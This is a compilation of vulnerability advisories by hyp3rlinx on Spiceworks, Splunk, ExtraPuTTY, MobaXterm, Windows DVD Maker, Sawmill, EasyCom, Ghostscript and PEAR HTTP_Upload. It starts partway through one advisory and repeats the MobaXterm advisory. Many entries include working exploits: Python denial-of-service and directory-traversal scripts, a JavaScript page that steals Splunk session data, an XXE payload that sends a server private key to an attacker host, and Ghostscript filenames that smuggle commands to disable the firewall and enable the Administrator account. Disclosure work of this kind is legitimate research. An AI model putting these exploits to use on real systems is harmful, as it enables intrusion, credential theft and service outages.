Remote Severity: = High Disclosure Timeline: == Vendor Notification: March 5, 2017 Vendor confirms vulnerability : March 21, 2017 Vendor "updated firmware April 7, 2017" : March 29, 2017 April 9, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
Spiceworks 7.5 TFTP Improper Access Control File Overwrite / Upload
[+] Credits: John Page AKA HYP3RLINX [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/SPICEWORKS-IMPROPER-ACCESS-CONTROL-FILE-OVERWRITE.txt [+] ISR: APPARITIONSEC Vendor: == www.spiceworks.com Product: = Spiceworks - 7.5 Provides network inventory and monitoring of all the devices on the network by discovering IP-addressable devices. It can be configured to provide custom alerts and notifications based on various criteria. it also provides a ticketing system, a user portal, an integrated knowledge base, and mobile ticket management. Vulnerability Type: == Improper Access Control File Overwrite / Upload CVE Reference: == CVE-2017-7237 Security Issue: The Spiceworks TFTP Server, as distributed with Spiceworks Inventory 7.5, allows remote attackers to access the Spiceworks "data\configurations" directory by leveraging the unauthenticated nature of the TFTP service for all clients who can reach UDP port 69. This allows remote attackers to overwrite files within the Spiceworks configurations directory, if the targeted file name is known or guessed. Remote attackers who can reach UDP port 69 can also write/upload arbitrary files to the "data\configurations", this can potentially become a Remote Code Execution vulnerability if for example an executable file e.g. EXE, BAT is dropped, then later accessed and run by an unknowing Spiceworks user. References - released April 3, 2017: https://community.spiceworks.com/support/inventory/docs/network-config#security Proof: === 1) Install Spiceworks 2) c:\>tftp -i VICTIM-IP PUT someconfig someconfig 3) Original someconfig gets overwritten OR Arbitrary file upload c:\>tftp -i VICTIM-IP PUT Evil.exe Evil.exe Network Access: === Remote Severity: = High Disclosure Timeline: == Vendor Notification: March 13, 2017 Sent vendor e.g. POC : March 23, 2017 Request status : March 30, 2017 Vendor reply: "We are still working on this" March 30, 2017 Vendor reply :"Thanks for bringing this to our attention" and releases basic security note of issue on website : April 3, 2017 April 5, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). HYP3RLINX
Splunk Enterprise Information Theft CVE-2017-5607
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/SPLUNK-ENTERPRISE-INFORMATION-THEFT.txt
[+] ISR: ApparitionSec
Vendor:
===
www.splunk.com
Product:
==
Splunk Enterprise
Splunk provides the leading platform for Operational Intelligence. Customers
use Splunk to search, monitor, analyze
and visualize machine data. Splunk Enterprise, collects and analyzes high
volumes of machine-generated data.
Vulnerability Type:
==
Javascript (JSON) Information Theft
CVE Reference:
==
CVE-2017-5607
Security Issue:
Attackers can siphon information from Splunk Enterprise if an authenticated
Splunk user visits a malicious webpage.
Some useful data gained is the currently logged in username and if remote user
setting is enabled. After, the username
can be use to Phish or Brute Force Splunk Enterprise login. Additional
information stolen may aid in furthering attacks.
Root cause is the global Window JS variable assignment of config?autoload=1
'$C'.
e.g.
window.$C = {"BUILD_NUMBER": 207789, "SPLUNKD_PATH"... etc... }
To steal information we simply can define a function to be called when the '$C'
JS property is "set" on webpage, for example.
Object.defineProperty( Object.prototype, "$C", { set:function(val){...
The Object prototype is a Object that every other object inherits from in
JavaScript, if we create a setter on the name of our target
in this case "$C", we can get/steal the value of this data, in this case it is
very easy as it is assigned to global Window namespace.
Affected Splunk Enterprise versions:
6.5.x before 6.5.3
6.4.x before 6.4.6
6.3.x before 6.3.10
6.2.x before 6.2.13.1
6.1.x before 6.1.13
6.0.x before 6.0.14
5.0.x before 5.0.18 and Splunk Light before 6.5.2
Vulnerability could allow a remote attacker to obtain logged-in username and
Splunk version-related information via JavaScript.
References:
=
https://www.splunk.com/view/SP-CAAAPZ3
https://www.splunk.com/view/SP-CAAAPZ3#InformationLeakageviaJavaScriptCVE20175607
Exploit/POC:
=
Reproduction:
1) Log into Splunk
2) place the below Javascript in webpage on another server.
"Splunk-Data-Theft.html"
Object.defineProperty( Object.prototype, "$C", { set:function(val){
//prompt("Splunk Timed out:\nPlease Login to Splunk\nUsername:
"+val.USERNAME, "Password")
for(var i in val){
alert(""+i+" "+val[i]);
}
}
});
https://VICTIM-IP:8000/en-US/config?autoload=1"</a>;>
3) Visit the server hosting the "Splunk-Data-Theft.html" webpage, grab current
authenticated user
4) Phish or brute force the application.
Video POC URL:
===
https://vimeo.com/210634562
Network Access:
===
Remote
Impact:
===
Information Disclosure
Severity:
=
Medium
Disclosure Timeline:
===
Vendor Notification: November 30, 2016
Vendor Acknowledgement: December 2, 2016
Vendor Release Splunk 6.5.3 / Patch : March 30, 2017
March 31, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
CVE-2017-7183 ExtraPuTTY v029_RC2 TFTP Denial Of Service
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/EXTRAPUTTY-TFTP-DENIAL-OF-SERVICE.txt
[+] ISR: ApparitionSec
Vendor:
==
www.extraputty.com
Product:
==
ExtraPuTTY - v029_RC2
hash: d7212fb5bc4144ef895618187f532773
Also Vulnerable: v0.30 r15
hash: eac63550f837a98d5d52d0a19d938b91
ExtraPuTTY is a fork from 0.67 version of PuTTY.
ExtraPuTTY has all the features from the original soft and adds others.
Below a short list of the principal features (see all features):
DLL frontend
TestStand API ( LabWindows ,TestStand 2012)
timestamp
StatusBar
Scripting a session with lua 5.3.
Automatic sequencing of commands.
Shortcuts for pre-defined commands.
Keyboard shortcuts for pre-defined command
Portability (use of directories structure)
Integrates FTP,TFTP,SCP,SFTP,Ymodem,Xmodem transfert protocols
Integrates PuTTYcyg,PuTTYSC, HyperLink, zmodem and session manager projects
Change default settings from configuration file
Change putty settings during session
PuTTYcmdSender : tool to send command or keyboard shortcut to multiple putty
windows
Vulnerability Type:
===
TFTP Denial of Service
CVE Reference:
==
CVE-2017-7183
Security Issue:
TFTP server component of ExtraPuTTY is vulnerable to remote Denial of Service
attack by sending large junk UDP
Read/Write TFTP protocol request packets.
Open ExtraPuTTY Session Manager, select => Files Transfer => TFTP Server, run
below Python exploit.
Then, BOOM
(100c.30c): Access violation - code c005 (first/second chance not available)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
kernel32.dll -
eax= ebx=0929ee98 ecx=0174 edx=7efefeff esi=0002 edi=
eip=77b4015d esp=0929ee48 ebp=0929eee4 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=0246
ntdll!ZwWaitForMultipleObjects+0x15:
Exploit/POC:
=
import socket
print "ExtraPuTTY v029_RC2 TFTP Server"
print "Remote Denial Of Service 0day Exploit"
print "John Page AKA hyp3rlinx\n"
TARGET=raw_input("[IP]>")
TYPE=int(raw_input("[Select DOS Type: Read=1, Write=2]>"))
CRASH="A"*2000
PORT = 69
if TYPE==1:
PAYLOAD = "\x00\x01"
PAYLOAD += CRASH + "\x00"
PAYLOAD += "netascii\x00"
elif TYPE==2:
PAYLOAD = "\x00\x02"
PAYLOAD += CRASH + "\x00"
PAYLOAD += "netascii\x00"
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto("\x00\x01\TEST\x00\netascii\x00", (TARGET, PORT))
recv = s.recvfrom(255)
if recv != None:
print "Crashing ExtraPuTTY TFTP server at : %s" %(TARGET)
s.sendto(PAYLOAD, (TARGET, PORT))
except Exception:
print 'Server not avail, try later'
s.close()
Network Access:
===
Remote
Severity:
=
Medium
Disclosure Timeline:
===
Vendor Notification: No reply
March 20, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
CVE-2017-6805 MobaXterm Personal Edition v9.4 Path Traversal Remote File Disclosure
+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MOBAXTERM-TFTP-PATH-TRAVERSAL
-REMOTE-FILE-ACCESS.txt
[+] ISR: ApparitionSec
Vendor:
=
mobaxterm.mobatek.net
Product:
===
MobaXterm Personal Edition v9.4
Enhanced terminal for Windows with X11 server, tabbed SSH client, network tools
and much more.
Vulnerability Type:
=
Path Traversal Remote File Disclosure
CVE Reference:
==
CVE-2017-6805
Security Issue:
Remote attackers can use UDP socket connection to TFTP server port 69 and send
Read request, to retrieve otherwise protected files using
directory traversal attacks e.g. ../../../../Windows/system.ini
Start MobaXterm TFTP server which listens on default TFTP port 69.
c:\>tftp -i 127.0.0.1 GET ../../../../Windows/system.ini
Transfer successful: 219 bytes in 1 second(s), 219 bytes/s
c:\xampp\htdocs>type system.ini
; for 16-bit app support
[386Enh]
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON
[drivers]
wave=mmdrv.dll
timer=timer.drv
[mci]
Victim Data located on: 127.0.0.1
POC URL:
=
https://vimeo.com/207516364
Exploit:
==
import sys,socket
print 'MobaXterm TFTP Directory Traversal 0day Exploit'
print 'Read Windows/system.ini'
print 'hyp3rlinx \n'
HOST = raw_input("[IP]>")
FILE = 'Windows/system.ini'
PORT = 69
PAYLOAD = "\x00\x01" #TFTP Read
PAYLOAD += "../" * 4 + FILE + "\x00" #Read system.ini using directory traversal
PAYLOAD += "netascii\x00" #TFTP Type
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(PAYLOAD, (HOST, PORT))
out = s.recv(1024)
s.close()
print "Victim Data located on : %s " %(HOST)
print out.strip()
Network Access:
===
Remote
Severity:
=
High
Disclosure Timeline:
=
Vendor Notification: No Reply
March 10, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
Path Traversal Remote File Disclosure
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MOBAXTERM-TFTP-PATH-TRAVERSAL-REMOTE-FILE-ACCESS.txt
[+] ISR: ApparitionSec
Vendor:
=
mobaxterm.mobatek.net
Product:
===
MobaXterm Personal Edition v9.4
Enhanced terminal for Windows with X11 server, tabbed SSH client, network tools
and much more.
Vulnerability Type:
=
Path Traversal Remote File Disclosure
CVE Reference:
==
CVE-2017-6805
Security Issue:
Remote attackers can use UDP socket connection to TFTP server port 69 and send
Read request, to retrieve otherwise protected files using
directory traversal attacks e.g. ../../../../Windows/system.ini
Start MobaXterm TFTP server which listens on default TFTP port 69.
c:\>tftp -i 127.0.0.1 GET ../../../../Windows/system.ini
Transfer successful: 219 bytes in 1 second(s), 219 bytes/s
c:\xampp\htdocs>type system.ini
; for 16-bit app support
[386Enh]
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON
[drivers]
wave=mmdrv.dll
timer=timer.drv
[mci]
Victim Data located on: 127.0.0.1
POC URL:
=
https://vimeo.com/207516364
Exploit:
==
import sys,socket
print 'MobaXterm TFTP Directory Traversal 0day Exploit'
print 'Read Windows/system.ini'
print 'hyp3rlinx \n'
HOST = raw_input("[IP]>")
FILE = 'Windows/system.ini'
PORT = 69
PAYLOAD = "\x00\x01"#TFTP Read
PAYLOAD += "../" * 4 + FILE + "\x00"#Read system.ini using
directory traversal
PAYLOAD += "netascii\x00" #TFTP Type
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(PAYLOAD, (HOST, PORT))
out = s.recv(1024)
s.close()
print "Victim Data located on : %s " %(HOST)
print out.strip()
Network Access:
===
Remote
Severity:
=
High
Disclosure Timeline:
=
Vendor Notification: No Reply
March 10, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
CVE-2017-0045 Windows DVD Maker XML External Entity File Disclosure
[+] Credits: John Page AKA hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-DVD-MAKER-XML-EXTERNAL-ENTITY-FILE-DISCLOSURE.txt [+] ISR: ApparitionSec Vendor: = www.microsoft.com Product: = Windows DVD Maker v6.1.7 Windows DVD Maker is a feature you can use to make DVDs that you can watch on a computer or on a TV using a regular DVD player. Vulnerability Type: = XML External Entity Injection CVE Reference: == CVE-2017-0045 MS17-020 Security issue: Windows DVD Maker Project ".msdvd" files are prone to XML External Entity attacks allowing remote attackers to gain access to files from a victims computer using a specially crafted malicious .msdvd file, resulting in remote information / file disclosures. POC URL: = https://vimeo.com/208383182 References: https://technet.microsoft.com/library/security/MS17-020 https://support.microsoft.com/en-us/help/3208223/ms17-020-security-update-for-windows-dvd-maker-march-14-2017 Applies to: Windows Server 2008 R2 Service Pack 1 Windows Server 2008 R2 Datacenter Windows Server 2008 R2 Enterprise Windows Server 2008 R2 Standard Windows Web Server 2008 R2 Windows Server 2008 R2 Foundation Windows 7 Service Pack 1 Windows 7 Ultimate Windows 7 Enterprise Windows 7 Professional Windows 7 Home Premium Windows 7 Home Basic Windows 7 Starter Windows Server 2008 Service Pack 2 Windows Server 2008 Foundation Windows Server 2008 Standard Windows Server 2008 for Itanium-Based Systems Windows Web Server 2008 Windows Server 2008 Enterprise Windows Server 2008 Datacenter Windows Vista Service Pack 2 Windows Vista Home Basic Windows Vista Home Premium Windows Vista Business Windows Vista Ultimate Windows Vista Enterprise Windows Vista Starter Exploit code(s): === Steal XAMPP Web Servers private key "server.key". 1) python -m SimpleHTTPServer 8080 (listens on ATTACKER-IP, hosts payload.dtd) 2) "payload.dtd" http://ATTACKER-IP:8080?%file;'>"> %all; 3) "Evil.msdvd" http://ATTACKER-IP:8080/payload.dtd;> %dtd;]> RESULT: XAMPP Web Server private key sent to attacker: e.g. C:\>python -m SimpleHTTPServer 8080 Serving HTTP on 0.0.0.0 port 8080 ... 127.0.0.1 - - [13/Mar/2017 23:53:36] "GET /payload.dtd HTTP/1.1" 200 - 127.0.0.1 - - [13/Mar/2017 23:53:36] "GET /?-BEGIN%20RSA%20PRIVATE%20KEY-MIICXQIBAAKBgQDBJdMn4+ytDYNqbedfmnUQI+KQnaBjlY8dQZpY1ZpjjFtzhpB5zMPWo3m4dbwelHx8buOt0CdcC8YMavkPMv6zxHoQIwQrKSjUqvmzL2YQ+KfBzWDEayhX42c7957NSCLcOOpIE4A6QJdXDEc1Rj1xYpruU51jDmd6KMmkNP8Z7QIDAQABAoGBAJvUs58McihQrcVRdIoaqPXjrei1c/DEepnFEw03EpzyYdo8KBZM0Xg7q2KKgsM9U45lPQZTNmY6DYh5SgYsQ3dGvocvwndq+wK+QsWH8ngTYqYqwUBBCaX3kwgknAc++EpRRVmV0dJMdXt3xAUKSXnDP9fLPdKXffJoG7C1HHVVAkEA+087rR2FLCjdRq/9WhIT/p2U0RRQnMJyQ74chIJSbeyXg8E ll5QxhSg7skrHSZ0cBPhyaLNDIZkn3NMnK2UqhwJBAMTAsUorHNo4dGpO8y2HE6QXxeuX05OhjiO8H2hmkcuMi2C9OwGIrI+lx1Q8mK261NKJh7sSVwQikh5YQYLKcOsCQQD6YqcChDb7GHvewdmatAhX1ok/Bw6KIPHXrMKdA3s9KkyLaRUbQPtVwBA6Q2brYS1Zhm/3ASQRhZbB3V9ZTSJhAkB772097P5Vr24VcPnZWdbTbG4twwtxWTix5dRa7RY/k55QJ6K9ipw4OBLhSvJZrPBWVm97NUg+wJAOMUXC30ZVAkA6pDgLbxVqkCnNgh2eNzhxQtvEGE4a8yFSUfSktS9UbjAATRYXNv2mAms32aAVKTzgSTapEX9M1OWdk+/yJrJs-END%20RSA%20PRIVATE%20KEY- HTTP/1.1" 301 - 127.0.0.1 - - [13/Mar/2017 23:53:37] "GET /?-BEGIN%20RSA%20PRIVATE%20KEY-MIICXQIBAAKBgQDBJdMn4+ytDYNqbrdfmnUQI+KQnaBjlY8dQZpY1ZxjjFtzhpB5zMPmo4m4dbwelHx8buOt6CdcC8YMavkPMv6zxHoQIwQrKSjUqvmzL2YQ+KfBzWDEayhX42c7957NSCLcOOpIE4A6QJdXDEc1Rj1xYpruU51jDmd6KMmkNP8Z7QIDAQABAoGBAJvUs58McihQrcVRdIoaqPXjrei1c/DEepnFEw03EpzyYdo8KBZM0Xg7q2KKgsM9U45lPQZTNmY6DYh5SgYsQ3dGvocvwndq+wK+QsWH8ngTYqYqwUBBCaX3kwgknAc++EpRRVmV0dJMdXt3xAUKSXnDP9fLPdKXffJoG7C1HHVVAkEA+087rR2FLCjdRq/9WhIT/p2U0RRQnMJyQ74chIJSbeyXg8E ll5QxhSg7skrHSZ0cBPhyaLNDIZkn3NMnK2UqhwJBAMTAsUorHNo4dGpO8y2HE6QXxeuX05OhjiO8H2hmmcuMi2C9OwGIrI+lx1Q8mK261NKJh7sSVwQikh3YQYiKcOsCQQD6YqcChDb7GHvewdmatAhX1ok/Bw6KIPHXrMKdA3s9KkyLaRUbQPtVwBA6Q2brYS1Zhm/3ASQRhZbB3V9ZTSJhAkB772097P5Vr24VcPnZWdbTbG4twwtxWTix5dRa7RY/k55QJ6K9ipw4OBLhSvJZrPBWVm97NUg+wJAOMUXC30ZVAkA6pDgLbxVqkCnNgh2eNzhxQtvEGE4a8yFSUfSktS9UbjAATRYXNv2mAms32aAVKTzgSTapEX9M1OWdk+/yJrJs-END%20RSA%20PRIVATE%20KEY-/ HTTP/1.1" 200 - Disclosure Timeline: = Vendor Notification: September 3, 2016 Vendor acknowledgement: November 17, 2016 March 14, 2017 : Vendor released MS17-020 March 15, 2017 : Public Disclosure Network access: = Remote Severity: === High [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due c
Sawmill Enterprise v8.7.9 Pass The Hash Authentication Bypass
[+] Credits: John Page AKA Hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/SAWMILL-PASS-THE-HASH-AUTHENTICATION-BYPASS.txt
[+] ISR: ApparitionSec
Vendor:
===
www.sawmill.net
Product:
Sawmill Enterprise v8.7.9
sawmill8.7.9.4_x86_windows.exe
hash: b7ec7bc98c42c4908dfc50450b4521d0
Sawmill is a powerful heirarchical log analysis tool that runs on every major
platform.
Vulnerability Type:
===
Pass the Hash Authentication Bypass
CVE Reference:
==
CVE-2017-5496
Security Issue:
=
Sawmill suffers from a classic "Pass The Hash" vulnerability whereby an
attacker who gains access to the hashed user account passwords
can login to the Sawmill interface using the raw MD5 hash values, allowing
attackers to bypass the work of offline cracking
account password hashes.
This issue usually is known to affect Windows systems e.g. (NT Pass the
Hash/Securityfocus, 1997). However, this vulnerability can also
present itself in a vulnerable Web application.
Sawmill account password hashes are stored under LogAnalysisInfo/ directory in
"users.cfg".
e.g.
users = {
root_admin = {
username = "admin"
password_checksum = "e99a18c428cb38d5f260853678922e03"
email_address = ""
This config file is stored local to the Sawmill application. However, if an
attacker gains access to a backup of the config that is
stored in some other location that is then compromised, it can lead to
subversion of Sawmills authenticaton process.
Moreover, since 'users.cfg' file is world readble a regular non Admin Windows
user who logs into the system running sawmill can now grab
a password hash and easily login to the vulnerable application without the
needing the password itself.
How to test?
Sawmill running (default port 8988), log off Windows and switch to a "Standard"
Windows non Administrator user.
1) Open "users.cfg" under Sawmills directory "C:\Program Files\Sawmill
8\LogAnalysisInfo" and copy the root_admin Admin password hash.
2) Go to the Sawmill login page in web browser http://VICTIM-IP:8988/ enter
username 'admin' and the hash, Tada! your Admin.
Finally, Sawmill passwords are hashed using vulnerable MD5 algorithm and no
salt.
e.g.
password: abc123
MD5 hash:
e99a18c428cb38d5f260853678922e03
Disclosure Timeline:
=
Vendor Notification: January 7, 2017
CVE-2017-5496 assigned : January 20
Request status : January 26
Vendor: Fix avail later in year still no ETA
Inform vendor public disclose date
February 18, 2017 : Public Disclosure
Network Access:
===
Remote
Impact:
==
Information Disclosure
Privilege Escalation
Severity Level:
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
Hyp3rlinx
EasyCom SQL iPlug Denial Of Service
[+] Credits: John Page AKA Hyp3rlinX
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/EASYCOM-SQL-IPLUG-DENIAL-OF-SERVICE.txt
[+] ISR: ApparitionSec
Vendor:
easycom-aura.com
Product:
===
SQL iPlug
EasycomPHP_4.0029.iC8im2.exe
SQL iPlug provides System i applications real-time access to heterogeneous and
external databases
(Oracle, SQL Server, MySQL, MS Access, Sybase, Progress) in a completely
transparent manner and without requiring replication.
Vulnerability Type:
===
Denial Of Service
CVE Reference:
==
CVE-2017-5359
Security Issue:
SQL iPlug listens on port 7078 by default, it suffers from denial of service
when sending overly long string via
HTTP requests fed to the "D$EVAL" parameter.
Exploit/POC:
import socket
print 'EasyCom SQL-IPLUG DOS 0day!'
print 'hyp3rlinx'
IP = raw_input("[IP]> ")
PORT = 7078
payload="A"*43000
arr=[]
c=0
while 1:
try:
arr.append(socket.create_connection((IP,PORT)))
arr[c].send('GET /?D$EVAL='+payload+" HTTP/1.1\r\n\r\n")
c+=1
print "doit!"
except socket.error:
print "[*] 5th ave 12:00"
raw_input()
break
Disclosure Timeline:
==
Vendor Notification: December 22, 2016
Vendor acknowledgement: December 23, 2016
Vendor Release Fix/Version February 20, 2017
February 22, 2017 : Public Disclosure
Network Access:
===
Remote
Severity:
===
Medium
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx
Ghostscript 9.20 Filename Command Execution
[+]#
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/GHOSTSCRIPT-FILENAME-COMMAND-EXECUTION.txt
[+] ISR: ApparitionSec
[+]
Vendor:
===
ghostscript.com
Product:
Ghostscript 9.20
gs920w32.exe
Windows (32 bit)
hash: fee2cc1b8b467888a4ed44dd9f4567ed
Ghostscript is a suite of software based Postscript and PDF
interpreter/renderers for file conversion.
Vulnerability Type:
==
Filename Command Execution
CVE Reference:
==
N/A
Security Issue:
The ghostscript ps2epsi translator to processes ".ps" files executes arbitrary
commands from specially crafted filenames that contain
OS commands as part of the processed postscript files name. This feature seems
to work only using the ps2epsi translator.
Other tested GS translator calls like 'ps2pdf' fail.
c:\>ps2epsi
"Usage: ps2epsi "
Example, take a file "POC&;1.ps", it will run arbitrary
Commands contained after the ampersand character "&".
If a user runs some automated script to call the ps2epsi translator to process
".ps" files from a remote share or directory
where actual filename is unknown, it can potentially allow attackers to execute
arbitrary commands on victims machine.
Characters like "/", ":" are restricted in filenames, but we can abuse Windows
netsh and wmic to bypass some of these barriers.
Quick Ghostscript CL test.
Create file called Test1.ps
ps2epsi "Test1.ps" outfile
BOOM! calc.exe runs...
Exploit/POC:
=
Add Ghostscript lib 'c:\Program Files (x86)\gs\gs9.20\lib' to Windows
environmental Path, so we can easily call 'ps2epsi' GS CMD.
Create the following malicious ".ps" postscript files.
1) Turn of Windows Firewall
Test Advfirewall set allprofiles state off&;1.ps
2) Enable Windows Administrator account (using WMIC).
Test useraccount where name='administrator' set disabled='false'&;1.ps
If user don't have wmic on path, fix it for POC by set environmental system
variable.
Add "C:\Windows\system32\wbem;" to 'Path' variable.
Run below bat script to process bunch of *.ps" files.
"POC.bat"
@echo off
rem ghostscript Filename Command Execution POC
rem by hyp3rlinx
for %%1 in ("*.ps") do; ps2epsi "%%1" "evil.ps"
Severity:
=
Medium
Disclosure Timeline:
===
Vendor Notification: No replies
February 2, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx
PEAR HTTP_Upload v1.0.0b3 Arbitrary File Upload
[+]
[+] Credits: John Page AKA Hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/PEAR-HTTP_UPLOAD-ARBITRARY-FILE-UPLOAD.txt
[+] ISR: ApparitionSEC
[+]
Vendor:
pear.php.net
Product:
HTTP_Upload v1.0.0b3
Download:
https://pear.php.net/manual/en/package.http.http-upload.php
Easy and secure managment of files submitted via HTML Forms.
pear install HTTP_Upload
This class provides an advanced file uploader system for file uploads made
from html forms. Features:
* Can handle from one file to multiple files.
* Safe file copying from tmp dir.
* Easy detecting mechanism of valid upload, missing upload or error.
* Gives extensive information about the uploaded file.
* Rename uploaded files in different ways: as it is, safe or unique
* Validate allowed file extensions
* Multiple languages error messages support (es, en, de, fr, it, nl, pt_BR)
Vulnerability Type:
==
Arbitrary File Upload
CVE Reference:
==
N/A
Vulnerability Details:
=
The package comes with an "upload_example.php" file to test the package, when
uploading a "restricted" PHP file
user will get message like "Unauthorized file transmission".
Line: 488 of "Upload.php"
var $_extensionsCheck = array('php', 'phtm', 'phtml', 'php3', 'inc');
If user does not go thru the "Upload.php" code line by line. They will find
option to set case sensitive check.
e.g. Line: 503 "$_extensionsCaseSensitive"=true
Line: 874
* @param bool $case_sensitive whether extension check is case sensitive.
* When it is case insensitive, the extension
* is lowercased before compared to the array
* of valid extensions.
This setting looks to prevent mixed or uppercase extension on disallowed PHP
file type bypass before uploading.
However, some developers are unaware that "Apache" can process file with
extension like PHP.1, PHP.; etc.
if the last extension is not specified in the list of mime-types known to the
web server.
Therefore, attackers can easily bypass the security check by appending ".1" to
end of the file,
which can result in arbitrary command execution on the affected server.
e.g.
"ext_bypass.php.1" contents:
Sucessfully Tested on: Bitnami wampstack-5.6.29-0.
Server version: Apache/2.4.23 (Win64)
Sucessfully Tested on: XAMPP for Linux 5.6.8-0
Server version: Apache/2.4.12 (Unix)
Disclosure Timeline:
==
Vendor Notification: December 31, 2016
Similar bug reported and open 2012
Issue Fixed: January 17, 2017
January 25, 2017 : Public Disclosure
Severity Level:
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
